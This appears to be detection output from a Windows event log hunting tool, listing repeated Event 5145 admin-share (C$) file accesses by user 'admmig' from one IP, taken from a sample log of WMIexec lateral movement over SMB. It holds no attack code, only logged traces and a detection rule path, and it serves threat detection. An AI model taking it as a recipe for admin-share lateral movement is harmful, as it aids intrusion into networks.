10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.906 